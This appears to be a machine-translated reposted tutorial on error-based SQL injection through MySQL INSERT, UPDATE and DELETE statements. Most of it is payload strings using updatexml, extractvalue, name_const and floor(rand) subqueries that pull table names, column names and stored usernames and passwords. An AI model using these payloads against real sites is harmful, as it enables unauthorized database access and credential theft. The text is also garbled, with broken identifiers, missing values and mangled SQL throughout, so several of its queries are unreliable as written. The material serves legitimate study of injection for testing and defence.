Fetching data using insert,update and delete injections

About 0x00

Using SQL injection to obtain database data, the method can be broadly divided into joint query, error, Boolean blind and delay injection, which are usually based on the SQL injection point in SELECT query statement. Well, when we find an injection point based on INSERT, UPDATE, DELETE statement (for example, some sites will record user browsing records, including Referer, CLIENT_IP, user-agent, etc., there are similar to user registration, password modification, Information deletion and other functions), can you use the above method to get the data we need? Here, let's take a look at MySQL for example, and see how to get the data we want in the INSERT, UPDATE, delete injection points.

0X01 Environment Construction

To better demonstrate the injection effect, we first create the original data using the following statement:

Create DATABASE Newdb;use newdb;create table users (id int (3) NOT NULL Auto_increment,username varchar (a) Not null,passwor D varchar (c) Not  null,primary key (ID)); INSERT into users values (1, ' Jane ', ' Eyre ');

Take a look at the current data structure:

0x02 injection Syntax

Because we are using the wrong pattern here, the idea is to construct syntax errors in the INSERT, UPDATE, DELETE statements, using the following statement:

INSERT into users (ID, username, password) VALUES (2, "inject here", ' Olivia '); INSERT into users (ID, username, password) VALUES (2, "inject here", ' Olivia ');

Note: As you can see in the Username field, we fill in the "inject here" and "inject here" two fields to achieve the error, one is the single quotation mark, the other is the double quotation mark inclusion, to be constructed flexibly according to the actual injection point.

0x03 using Updatexml () to get data

The Updatexml () function is an XPath function that MySQL queries and modifies XML document data.

Payload

or Updatexml (1,concat (0x7e, (version ())), 0) or

Insert:

INSERT into users (ID, username, password) VALUES (2, ' Olivia ' or Updatexml (1,concat (0x7e, (version ())), 0) or ' ', ' Nervo ');

Update:

UPDATE users SET password= ' Nicky ' or Updatexml (2,concat (0x7e, (version ())), 0) or ' WHERE id=2 and username= ' Olivia ';

Delete:

DELETE from users WHERE id=2 or Updatexml (1,concat (0x7e, (version ())), 0) or ';

Extract data:

Due to the limited space, I will only use Insert as an example when the INSERT, UPDATE, delete usages are consistent.

The payload used are:

or Updatexml (0,concat (0x7e, (SELECT concat (table_name) from Information_schema.tables WHERE table_schema=database () Limit 0,1)), 0) or

Get newdb database table name:

Get the column name of the users table:

Use Insert to get data from the users table:

Use Delete to get data from the users table:

We can get the database table name, column name with INSERT, UPDATE, DELETE statement, but cannot get the data of the current table with update:

Here, in order to demonstrate getting data with update, we temporarily create a students table with id,name,address and insert a piece of data:

Use update again to get the data for the users table:

If you run into an update injection and want to get the data from the current table, you can use a double query, which I'll talk about later.

0X04 uses Extractvalue () to get data

The Extractvalue () function is also an XPath function that MySQL queries and modifies XML document data.

Payload

or Extractvalue (1,concat (0x7e,database ())) or

Insert:

INSERT into users (ID, username, password) VALUES (2, ' Olivia ' or Extractvalue (1,concat (0x7e,database ())) or ', ' Nervo ');

Update

UPDATE users SET password= ' Nicky ' or Extractvalue (1,concat (0x7e,database ())) or ' WHERE id=2 and username= ' Nervo ';

Delete

DELETE from users WHERE id=1 or Extractvalue (1,concat (0x7e,database ())) or ';

Extract data:

Similarly, when insert, UPDATE, delete usages are consistent, I'll just use Insert as an example.

Get newdb database table name:

INSERT into users (ID, username, password) VALUES (2, ' Olivia ' or Extractvalue (1,concat (0x7e) (SELECT concat (table_name) FR OM information_schema.tables WHERE table_schema=database () limit))) or ' ', ' Nervo ');

Get the column name of the users table:

INSERT into users (ID, username, password) VALUES (2, ' Olivia ' or Extractvalue (1,concat (0x7e) (SELECT concat (column_name) F ROM information_schema.columns WHERE table_name= ' users ' limit 0,1))) or ' ', ' Nervo ');

Get data for the users table:

INSERT into users (ID, username, password) VALUES (2, ' Olivia ' or Extractvalue (1,concat (0x7e) (SELECT concat_ws (': '), IDs, use Rname, password) from the users limit 0,1)) or ' ', ' Nervo ');

Similarly, we can use INSERT, UPDATE, DELETE statements to get to the database table name, column name, but cannot use update to get the data of the current table.

0x05 using Name_const () to get data

The Name_const () function is a function of the MYSQL5.0.12 version that returns the given value. When used to produce a result set column, Name_const () causes the column to use the given name.

Payload:

or (SELECT * FROM (SELECT (Name_const (Version (), 1)), Name_const (version (), 1)) a) or

Insert:

INSERT into users (ID, username, password) VALUES (1, ' Olivia ' or (SELECT (Name_const (Version (), 1)), name_cons T (version (), 1)) a) or ' ', ' Nervo ');

Update

UPDATE users SET password= ' Nicky ' or (SELECT * FROM (SELECT (Name_const (Version (), 1)), Name_const (version (), 1)) a) or ' WHE RE id=2 and Username= ' Nervo ';

Delete

DELETE from the Users WHERE id=1 or (SELECT * FROM (SELECT (Name_const (Version (), 1)), Name_const (version (), 1)) a) or ';

Extract data:

In the latest MySQL version, the Name_const () function is used only to extract version information to the database. However, in some older versions of MySQL that are higher than 5.0.12 (including 5.0.12), more data can be extracted further. Here I use MySQL5.0.45 to demonstrate.

First, let's make a simple select query to check if we can extract the data.

INSERT into users (ID, username, password) VALUES (1, ' Olivia ' or (select*from) (Select Name_const ((select 2), 1), Name_const ( (SELECT 2), 1)) a) or ', ' Nervo ');

If the error 1210 (HY000) is displayed: Incorrect arguments to NAME_CONST, wash and sleep.

If the error 1060 (42S21): Duplicate column name ' 2 ' is displayed, further data can be obtained.

Get newdb database table name:

INSERT into users (ID, username, password) VALUES (1, ' Olivia ' or (Select*from (select Name_const Formation_schema.tables WHERE table_schema=database () limit, 1), Name_const ((SELECT table_name from Information_ Schema.tables WHERE table_schema=database () limit, 1)) a) or "', ' Nervo '); ERROR 1060 (42S21): Duplicate column name ' users '

Get the column name of the users table:

INSERT into users (IDs, username, password) VALUES (1, ' Olivia ' or (Select*from (select Name_const (select column_name from I Nformation_schema.columns WHERE table_name= ' users ' limit 0,1), 1), Name_const ((SELECT column_name from Information_ Schema.columns WHERE table_name= ' users ' limit 0,1), 1)) a) or ' ', ' Nervo '); ERROR 1060 (42S21): Duplicate column name ' ID '

Get data for the users table:

INSERT into users (ID, username, password) VALUES (2, ' Olivia ' or (Select*from (select Name_const (concat_ws , username, password) from the users limit 0,1), 1), Name_const ((SELECT concat_ws (0x7e,id, username, password) from the users limit 0,1), 1)) a) or ', ' Nervo '); ERROR 1060 (42S21): Duplicate column name ' 1~jane~eyre '

0x06 using sub-query injection

The principle is consistent with the explicit error injection of select queries.

Insert:

INSERT into users (IDs, username, password) VALUES (1, ' Olivia ' or (select 1 from (SELECT COUNT (*), concat (select (select Con Cat (0x7e,0x27,cast (Database () as Char), 0x27,0x7e)) from Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.columns GROUP by X) a) or ', ' Nervo ');

Update

UPDATE users SET password= ' Nicky ' or (select 1 from (SELECT COUNT (*), concat ((Select Concat (0x7e,0x27,cast ( Database () as Char), 0x27,0x7e) from Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_ Schema.columns GROUP by X) a) or ' WHERE id=2 and username= ' Nervo ';

Delete

DELETE from the Users WHERE id=1 or (select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (0x7e,0x27,cast) (Database () as C har), 0x27,0x7e) (Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.columns Group by x) a) or ';

Extract data:

Get newdb database table name:

INSERT into users (IDs, username, password) VALUES (1, ' Olivia ' or (select 1 from (SELECT COUNT (*), concat (SELECT (SE Lect distinct concat (0x7e,0x27,cast (table_name as char), 0x27,0x7e) from Information_schema.tables WHERE table_schema= Database () limit (information_schema.tables)), Floor (rand (0) *)) x from Information_schema.columns Group by X) a) or ', ' Nervo ');

Get the column name of the users table:

INSERT into users (IDs, username, password) VALUES (1, ' Olivia ' or (select 1 from (SELECT COUNT (*), concat (SELECT (S Elect distinct concat (0x7e,0x27,cast (column_name as Char), 0x27,0x7e) from Information_schema.columns WHERE Table_ Schema=database () and table_name= ' users ' limit 0,1)) from Information_schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.columns GROUP by X) a) or ', ' Nervo ');

Get data for the users table:

INSERT into users (IDs, username, password) VALUES (1, ' Olivia ' or (select 1 from (SELECT COUNT (*), concat (SELECT (S Elect Concat (0x7e,0x27,cast (users.username as Char), 0x27,0x7e) from ' newdb '. Users LIMIT 0,1] from Information_ Schema.tables limit 0,1), floor (rand (0) *)) x from Information_schema.columns Group by X) a) or ' ', ' Nervo ');

0x07 more closed variants

' or (payload) or ' and (payload) and ' or (payload) and ' or (payload) and ' = ' * (payload) * ' or (payload) and ' "– ( Payload) – "

0x08 References

http://dev.mysql.com/

Http://websec.ca/kb/sql_injection

From:http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

Transferred from: http://drops.wooyun.org/tips/2078

Fetching data using insert,update and delete injections